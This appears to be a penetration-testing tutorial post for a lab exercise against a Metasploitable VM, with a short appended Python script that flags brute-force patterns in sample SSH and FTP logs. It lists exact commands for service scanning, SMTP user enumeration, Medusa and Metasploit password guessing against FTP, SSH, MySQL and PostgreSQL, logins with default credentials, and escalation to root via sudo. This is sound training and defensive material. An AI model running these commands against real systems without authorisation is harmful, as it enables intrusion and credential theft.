#HackOnTuesday Episode 2 Attacking Passwords and Cracking Hashes

Among the skills a penetration tester must have is the ability to attack passwords and crack hashes. In this episode of #HackOnTuesday, we go through some tools and techniques to attack weak passwords on the most common services, such as FTP, Telnet and SSH, just to name a few. After having cracked several passwords, Gianni moves on and uses a common sudo misconfiguration to get root access on the Metasploitable VM.

Tools, Scripts, and Exploits

The tools, scripts, and exploits used in this episode of #HackOnTuesday are:

» Nmap (https://nmap.org/)
» Medusa Parallel Network Login Auditor (http://foofus.net/goons/jmk/medusa/medusa.html)
» Wordlists (https://wiki.skullsecurity.org/Passwords)

Steps

» Identify the services listening on the target
   • nmap -v -sV 192.168.75.149 -p-
» Test if VRFY, RCPT, or EXPN are enabled.
   • nc 192.168.75.149 25
   • RCPT TO:mike # This returns an “Error: need MAIL command” message.
   • EXPN mike # This returns an “Error: command not recognized” message.
   • VRFY mike # This returns a “Recipient address rejected” message.
   • VRFY root # This works fine!
» Enumerate the local users via SMTP
   • With Nmap:
      - nmap --script smtp-enum-users.nse 192.168.75.149 # In this case, we get a “Method RCPT returned a unhandled status code.” message. As seen before, the RCPT method returns an error.
   • With Metasploit:
      - msfconsole
      - use auxiliary/scanner/smtp/smtp_enum
      - show options
      - set RHOSTS 192.168.75.149
      - set USER_FILE /home/kusanagi/metasploitable/wordlists/usernames.txt
      - set THREADS 20
      - run
» Attack the FTP service (port 21)
   • medusa -h 192.168.75.149 -U ftp_usernames.txt -P ftp_passwords.txt -e ns -M ftp -v 6 -t 10 -O ftp.log
   • ftp 192.168.75.149 # Username: msfadmin , Password: msfadmin
   • cd vulnerable
   • ls
   • exit
   • ftp 192.168.75.149 # Username: user, Password: user
   • ls
   • exit
» Attack the SSH service (port 22)
   • medusa -h 192.168.75.149 -U ssh_usernames.txt -P ssh_passwords.txt -e ns -M ssh -t 10 -O ssh.log
» Attack the Telnet service (port 23)
   • telnet 192.168.75.149
   • msfadmin/msfadmin # or user/user
   • uname -a
» Attack the MySQL service (port 3306)
   • msfconsole
   • search mysql
   • use auxiliary/scanner/mysql/mysql_login
   • show options
   • set RHOSTS 192.168.75.149
   • set USER_FILE /home/kusanagi/metasploitable/wordlists/mysql_usernames.txt
   • set PASS_FILE /home/kusanagi/metasploitable/wordlists/mysql_passwords.txt
   • set VERBOSE false # If true, it may take twice as much time to find the password for long wordlists.
   • run
   • mysql -h 192.168.75.149 -u root -p # Password: root
» Attack the PostgreSQL service (port 5432)
   • msfconsole
   • search postgres
   • use auxiliary/scanner/postgres/postgres_login
   • show options
   • set RHOSTS 192.168.75.149
   • run
   • Open a new terminal and connect to the PostgreSQL Server
      - psql -h 192.168.75.149 -d template1 -U postgres -W
      - SELECT version();
      - \q
» Escalate the privileges
   • ssh user@192.168.75.149
   • sudo -i # This returns the “user is not in the sudoers file.” message.
   • exit
   • ssh msfadmin@192.168.75.149
   • sudo -i
   • whoami
» Game over!
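The Medusa runs against FTP and SSH above leave a distinctive trail on the target: many failed logins for many different usernames from one source in a short span, often followed by a success. The following Python script is an added example, not part of the episode: it parses constructed OpenSSH (auth.log) and vsftpd (vsftpd.log) lines and flags sources that match that pattern. The sample lines, the source addresses and the thresholds are assumptions.

```python
import re
from collections import defaultdict
# Constructed sample lines in OpenSSH (auth.log) and vsftpd (vsftpd.log) format, not captured
# from the episode's VM; 192.168.75.1 is an assumed guessing source, .20 a user who typo'd once.
SAMPLE_LOG = """\
Mar  5 10:00:01 target sshd[2201]: Failed password for invalid user admin from 192.168.75.1 port 50211 ssh2
Mar  5 10:00:01 target sshd[2202]: Failed password for msfadmin from 192.168.75.1 port 50212 ssh2
Mar  5 10:00:02 target sshd[2203]: Failed password for invalid user service from 192.168.75.1 port 50213 ssh2
Mar  5 10:00:02 target sshd[2204]: Accepted password for msfadmin from 192.168.75.1 port 50214 ssh2
Mar  5 10:00:09 target sshd[2210]: Failed password for alice from 192.168.75.20 port 41000 ssh2
Mon Mar  5 10:00:03 2018 [pid 3301] [anonymous] FAIL LOGIN: Client "192.168.75.1"
Mon Mar  5 10:00:03 2018 [pid 3302] [msfadmin] FAIL LOGIN: Client "192.168.75.1"
Mon Mar  5 10:00:04 2018 [pid 3303] [user] FAIL LOGIN: Client "192.168.75.1"
Mon Mar  5 10:00:04 2018 [pid 3304] [user] OK LOGIN: Client "192.168.75.1"
"""

# One regex per service; each captures (username, source IP).
FAIL = {
    "ssh": re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port \d+"),
    "ftp": re.compile(r"\[(\S+)\] FAIL LOGIN: Client \"([^\"]+)\""),
}
OK = {
    "ssh": re.compile(r"sshd\[\d+\]: Accepted password for (\S+) from (\S+) port \d+"),
    "ftp": re.compile(r"\[(\S+)\] OK LOGIN: Client \"([^\"]+)\""),
}

def analyse(log_text, max_failures=3, max_users=2):
    """Flag (service, source) pairs whose failures exceed a count or spread over
    many usernames (the -U wordlist pattern), and record any later success."""
    seen = defaultdict(lambda: {"attempts": 0, "users": set(), "success": []})
    for line in log_text.splitlines():
        for service, pat in FAIL.items():
            m = pat.search(line)
            if m:
                user, src = m.groups()
                seen[(service, src)]["attempts"] += 1
                seen[(service, src)]["users"].add(user)
        for service, pat in OK.items():
            m = pat.search(line)
            # A success from a source that already failed is the guessing attack paying off.
            if m and (service, m.group(2)) in seen:
                seen[(service, m.group(2))]["success"].append(m.group(1))
    return {k: {"attempts": r["attempts"], "users": sorted(r["users"]), "success": r["success"]}
            for k, r in seen.items()
            if r["attempts"] >= max_failures or len(r["users"]) >= max_users}

if __name__ == "__main__":
    for (service, src), rec in analyse(SAMPLE_LOG).items():
        print(f"{service} from {src}: {rec['attempts']} failures, users {rec['users']}, success {rec['success']}")
```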